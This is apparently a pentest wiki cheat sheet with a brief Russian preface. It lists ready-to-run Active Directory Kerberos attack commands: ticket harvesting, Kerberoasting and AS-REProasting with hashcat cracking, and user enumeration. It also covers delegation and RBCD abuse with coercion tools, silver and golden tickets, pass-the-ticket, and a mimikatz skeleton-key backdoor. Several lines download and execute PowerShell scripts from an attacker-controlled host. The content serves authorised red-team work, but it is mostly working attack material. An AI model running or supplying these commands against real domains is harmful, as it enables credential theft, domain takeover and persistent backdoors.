Kerberos

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

Зафиксируйте роль в домене и допустимые техники (read‑only / согласованная эксплуатация).
Соберите данные для картирования атаки (учётки, делегирование, доверия).
Двигайтесь по сценариям раздела с планом отката и контролем DC.
Команды и инструменты в блоках кода — на английском.

Методика

Ticket gathering

# Gathers tickets that are being transferred to the KDC
Rubeus.exe harvest /interval:30 
# Extract current TGTs
Rubeus.exe dump 

Kerberoasting

# Rubeus
IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-Rubeus.ps1') ; Invoke-Rubeus kerberoast
# Kerberoast
IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat {John | Hashcat} [ | % { $_.Hash } | Out-File -Encoding ASCII kerberoast_hashes.txt ]

GetUserSPNs.py '<Domain>/<Username>:<Password>'  -request -save -outputfile GetUserSPNs.txt -dc-ip $IP

IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-Kerberoast.ps1'); Get-NetUser| select samaccountname,serviceprincipalname

Cracking Kerberos Hashes

hashcat -m 13100 GetUserSPNs.txt <WORDLIST> -o <RESULT.txt>

AS-REProasting

# Modify the hash, so it looks like this "$krb5asrep$23$..."
.\Rubeus.exe asreproast

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>[:<domain_user_password>] [-no-pass] -request -format {hashcat | john} -outputfile <output_AS_REP_responses_file> 

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name> [-usersfile <users_file>] -format {hashcat | john} -outputfile <output_AS_REP_responses_file> [-no-pass]

Cracking password

hashcat -m 18200 -a 0 <hashes.txt> <wordlist.txt>

User Enum (Abusing Pre-Authentication)

kerbrute userenum --dc <DOMAIN_IP> -d <DOMAIN> <users.txt>

Unconstrained Delegation

Cached tickets

.\Rubeus.exe triage

.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass /ticket:<TICKET>

Force machines authentication

> C:\Windows\Tasks\PsExec64.exe -accepteula -s -d -i cmd.exe
> ```

```bash
.\Rubeus.exe monitor /interval:10 /nowrap

.\SharpSpoolTrigger.exe <TARGET_HOSTNAME> <LISTENER_HOSTNAME>

.\PetitPotam.exe <LISTENER_HOSTNAME> <TARGET_HOSTNAME>

.\SpoolSample.exe <TARGET_HOSTNAME> <LISTENER_HOSTNAME>

new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Invoke-Spoolsample.ps1') | IEX
Invoke-Spoolsample -Command "<TARGET_HOSTNAME> <LISTENER_HOSTNAME>"

python3 printerbug.py  <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_HOOSTNAME> <LISTENER_HOSTNAME>

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/<TARGET_HOSTNAME> /user:<TARGET_HOSTNAME>$ /nowrap /ticket:<TICKET>

# Create a new process
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:Administrator /password:FakePass123 /ticket:<TICKET>

# Import the ticket into the process
Invoke-Mimikatz -Command '"kerberos::ptt <KIRBI_FILE>"'

ls \\<HOSTNAME>\C$

Constrained Delegation

# List the tickets
.\Rubeus.exe triage
# Obtain the ticket
.\Rubeus.exe dump /service:krbtgt /nowrap /luid:<LUID>

.\Rubeus.exe s4u /impersonateuser:<IMPERSONATE_USER> /msdsspn:<ALLOWED2DELEGATE_SERVICE>/<ALLOWED2DELEGATE_HOSTNAME> /user:<ALLOWED2DELEGATE_HOSTNAME>$ /nowrap /ticket:<TICKET>

# Create a new process
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<IMPERSONATED_USER> /password:FakePass /ticket:<TICKET>

# Import Ticket into the process
Invoke-Mimikatz -Command '"kerberos::ptt <KIRBI_FILE>"'

ls \\<HOSNTAME>\c$

Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity)

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

# Convert the obtained SID to know the name of the ACL
ConvertFrom-SID <SID>

Get-DomainComputer -Identity <HOSTNAME> -Properties objectSid

$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<OBJECT_SID>)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "<TARGET_HOSTNAME>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose

powershell Get-DomainComputer -Identity "<TARGET_HOSTNAME>" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

# Obtain the machine's krbtgt ticket
.\Rubeus.exe triage
.\Rubeus.exe dump /service:krbtgt /nowrap /luid:<MACHINE_LUID>

# Perform the S4u
\Rubeus.exe s4u /user:<MACHINE_WITH_HIGHER_PRIVILEGES>$ /impersonateuser:<USER> /msdsspn:cifs/<HOSTNAME>.<DOMAIN> /nowrap /ticket:<TICKET>

.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass /ticket:<TICKET>

Alternate Service Name

.\Rubeus.exe s4u /ptt /impersonateuser:Administrator /msdsspn:<CONSTRAINED_SERVICE>/<HOSTNAME> /altservice:cifs /ticket:<TICKET>

Resource-Based Constrained Delegation (GenericWrite to Computer)

# Download dependencias
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1');
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Powermad.ps1');
# Create machine
New-MachineAccount -MachineAccount myComputer -Password $(ConvertTo-SecureString 'h4x' -AsPlainText -Force)

# Create AccessControl
$sid =Get-DomainComputer -Identity myComputer -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)

# Append AccessControl to victim machine
Get-DomainComputer -Identity <VULNERABLE_MACHINE_NAME> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Powermad.ps1');
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1');

New-MachineAccount -MachineAccount rulon -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose

# If Set-ADComputer, is not recognized it it is necessary to install the  (Requires high privileges)
Enable-WindowsOptionalFeature -FeatureName ActiveDirectory-Powershell -Online -All

Set-ADComputer <VULNERABLE_MACHINE_NAME>  -PrincipalsAllowedToDelegateToAccount rulon$ -Server <DC_IP> -Verbose

impacket-addcomputer -computer-name 'myComputer$' -computer-pass 'h4x' <DOMAIN>/<USER>:<PASSWORD>

impacket-rbcd -action write -delegate-to "<TARGET_COMPUTER>" -delegate-from "myComputer$" <DOMAIN>/<USER>:<PASSWORD>

$RBCDbytes = Get-DomainComputer <VULNERABLE_MACHINE_NAME>  -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0
ConvertFrom-SIDsuccessfully $Descriptor.DiscretionaryAcl.SecurityIdentifier

IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Invoke-Rubeus.ps1');
Invoke-Rubeus -Command 'hash /password:h4x'
Invoke-Rubeus -Command 's4u /user:myComputer$ /rc4:AA6EAFB522589934A6E5CE92C6438221 /impersonateuser:Administrator /msdsspn:CIFS/<VULNERABLE_MACHINE_NAME_DOMAIN> /domain:<DOMAIN> /dc:<DC_IP> /nowrap /ptt'

impacket-getST -spn cifs/<TARGET_HOSNTAME> -impersonate administrator '<DOMAIN>/myComputer$:h4x'

# Alternative 1 - Windows
ls \\<VULNERABLE_MACHINE_NAME>\c$

# Alternative 2 - Impacket
export KRB5CCNAME=$(pwd)/administrator.ccache
impacket-psexec administrator@backup01.corp.com -k -no-pass

S4U2Self Abuse

\Rubeus.exe s4u /impersonateuser:<ADMIN_USER> /nowrap /self /altservice:cifs/<HOSTNAME> /user:<HOSTNAME>$ /ticket:<TICKET>

WriteDacl over a group

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType, Identity |  Format-List}}}

ObjectDN              : CN=Admins,OU=Groups,DC=corp,DC=com
ActiveDirectoryRights : WriteDacl
AceType               : AccessAllowed
Identity              : CORP\User1

$creds = New-Object System.Management.Automation.PSCredential ("CORP\User1",(ConvertTo-SecureString "PassW0rd!" -AsPlainText -Force))

Add-DomainObjectAcl -TargetIdentity <VICTIM_IDENTITY> -PrincipalIdentity <NEW_USER> -Rights All -Verbose -Credential $creds

Add-DomainGroupMember -Identity 'Admins' -Members 'User1' -Credential $creds

Tickets

Silver Ticket (Local)

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:<serviceName>"

.\mimikatz.exe "kerberos::golden /user:<Administrator> /domain:<domain> /sid:<ServiceSID> /krbtgt:<ServiceHash_NTLM> /id:<ServiceAccountID>"

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

Silver Ticket (Remote)

ticketer.py -nthash <NTLM_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN_NAME> [-user-id <USER_ID|500>] <USERNAME_FOR_TICKET>

export KRB5CCNAME=<PATH>/<USERNAME_FOR_TICKET>.ccache 
smbclient.py -k -no-pass <MACHINE>
psexec.py -k -no-pass <DOMAIN>/<USERNAME>@<MACHINE>
secretsdump.py -k -no-pass <DOMAIN>/<USERNAME>@<MACHINE>

Golden Ticket

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt"

.\mimikatz.exe "kerberos::golden /user:<Administrator> /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HTML> /ptt [/id:<ServiceAccountID>]" "exit"

Cracking tickets

tgsrepcrack.py <wordlist.txt> <ticket.kirbi>

Pass The Ticket

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" #Dumping all the tickets en ficheros *.kirbi

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following commands by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pas

mimikatz.exe "kerberos::ptt <ticket.kirbi>" 
# List tickets, checking it has been imported correctly
klist
# Import the ticket
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file> 
# Execue a remote cmd
.\PsExec.exe -accepteula \\<remote_hostname> cmd 

Skeleton Key backdoor

.\mimikatz.exe "privilege::debug" "misc::skeleton"

net use C:\\<DC>\admin$ /user:Administrator mimikatz

Порядок действий​

Методика​

Ticket gathering​

Kerberoasting​

Cracking Kerberos Hashes​

AS-REProasting​

Cracking password​

User Enum (Abusing Pre-Authentication)​

Unconstrained Delegation​

Cached tickets​

Force machines authentication​

Constrained Delegation​

Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity)​

Alternate Service Name​

Resource-Based Constrained Delegation (GenericWrite to Computer)​

S4U2Self Abuse​

WriteDacl over a group​

Tickets​

Silver Ticket (Local)​

Silver Ticket (Remote)​

Golden Ticket​

Cracking tickets​

Pass The Ticket​

Skeleton Key backdoor​

Ссылки​